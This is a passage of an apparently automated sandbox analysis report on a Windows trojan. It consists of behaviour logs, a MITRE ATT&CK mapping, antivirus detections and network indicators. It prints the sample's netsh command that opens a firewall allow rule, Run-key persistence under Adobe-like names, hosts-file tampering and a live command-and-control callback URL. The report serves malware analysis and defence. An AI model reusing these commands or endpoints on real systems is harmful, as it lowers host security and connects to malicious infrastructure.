Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Registry Run Keys / Startup Folder21	Process Injection12	Masquerading31	OS Credential Dumping	Security Software Discovery21	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Standard Port11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter12	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder21	File and Directory Permissions Modification1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools3	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Modify Registry1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion41	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection12	Cached Domain Credentials	System Information Discovery122	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	21%	Virustotal		Browse
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	40%	ReversingLabs	Win64.Trojan.Fsysna

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.112.83.96:20000/callback	2%	Virustotal		Browse
http://185.112.83.96:20000/callback	100%	Avira URL Cloud	malware
http://185.112.83.96:20000/callbackmheap.freeSpanLocked	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.112.83.96:20000/callback	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.112.83.96:20000/callbackmheap.freeSpanLocked	acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.112.83.96	unknown	Russian Federation		50113	SUPERSERVERSDATACENTERRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553368
Start date:	14.01.2022
Start time:	19:10:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	130
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@232/30@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.7% (good quality ratio 91.5%) Quality average: 63.4% Quality standard deviation: 36.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net Execution Graph export aborted for target 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, PID 4356 because there are no executed function Execution Graph export aborted for target acrotray.exe, PID 5268 because there are no executed function Execution Graph export aborted for target acrotray.exe, PID 7120 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:11:34	API Interceptor	225x Sleep call for process: powershell.exe modified
19:11:37	API Interceptor	9x Sleep call for process: WMIC.exe modified
19:11:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
19:11:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
19:11:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
19:12:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.112.83.96	mGFEIH91A8.exe	Get hash	malicious	Browse	185.112.83.96:20000/callback

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SUPERSERVERSDATACENTERRU	vk8A1dXh5C.exe	Get hash	malicious	Browse	185.233.81.115
	GahImDA8DA.exe	Get hash	malicious	Browse	185.233.81.115
	prkVkqYIwv.exe	Get hash	malicious	Browse	185.233.81.115
	P42zLwaJQk.exe	Get hash	malicious	Browse	185.233.81.115
	9ro85QVN0F.exe	Get hash	malicious	Browse	185.233.81.115
	Mc7TWWp1Vp.exe	Get hash	malicious	Browse	185.233.81.115
	sbxGIUIhRd.exe	Get hash	malicious	Browse	185.233.81.115
	6zsU4O4WHq.exe	Get hash	malicious	Browse	185.233.81.115
	urMpgNNXPM.exe	Get hash	malicious	Browse	185.233.81.115
